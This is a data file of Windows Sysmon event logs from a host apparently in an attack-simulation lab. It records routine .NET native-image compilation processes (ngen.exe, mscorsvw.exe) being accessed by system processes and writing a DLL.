{"EventTime":"2020-08-01 05:59:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7369,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:04.184\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04A8-5F25-0000-001043EB0F00}\r\nTargetProcessId: 2848\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:04.184","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04A8-5F25-0000-001043EB0F00}","TargetProcessId":"2848","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7370,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:04.184\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04A8-5F25-0000-001043EB0F00}\r\nTargetProcessId: 2848\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:04.184","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04A8-5F25-0000-001043EB0F00}","TargetProcessId":"2848","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7371,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:04.184\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04A8-5F25-0000-001043EB0F00}\r\nTargetProcessId: 2848\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:04.184","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04A8-5F25-0000-001043EB0F00}","TargetProcessId":"2848","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7372,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:04.231\r\nProcessGuid: {A837DB8D-04A8-5F25-0000-001043EB0F00}\r\nProcessId: 2848\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b20-0\\System.AddIn.Contract.dll\r\nCreationUtcTime: 2020-08-01 05:59:04.231","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:04.231","ProcessGuid":"{A837DB8D-04A8-5F25-0000-001043EB0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b20-0\\System.AddIn.Contract.dll","CreationUtcTime":"2020-08-01 05:59:04.231","EventReceivedTime":"2020-08-01 05:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7373,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:04.262\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04A8-5F25-0000-0010D6EE0F00}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:04.262","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04A8-5F25-0000-0010D6EE0F00}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7374,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:04.262\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04A8-5F25-0000-0010D6EE0F00}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:04.262","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04A8-5F25-0000-0010D6EE0F00}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7375,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:04.262\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04A8-5F25-0000-0010D6EE0F00}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:04.262","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04A8-5F25-0000-0010D6EE0F00}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7376,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:04.324\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-049A-5F25-0000-0010336A0F00}\r\nTargetProcessId: 3544\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:04.324","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-049A-5F25-0000-0010336A0F00}","TargetProcessId":"3544","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7377,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:04.324\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-049A-5F25-0000-0010336A0F00}\r\nTargetProcessId: 3544\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:04.324","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-049A-5F25-0000-0010336A0F00}","TargetProcessId":"3544","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
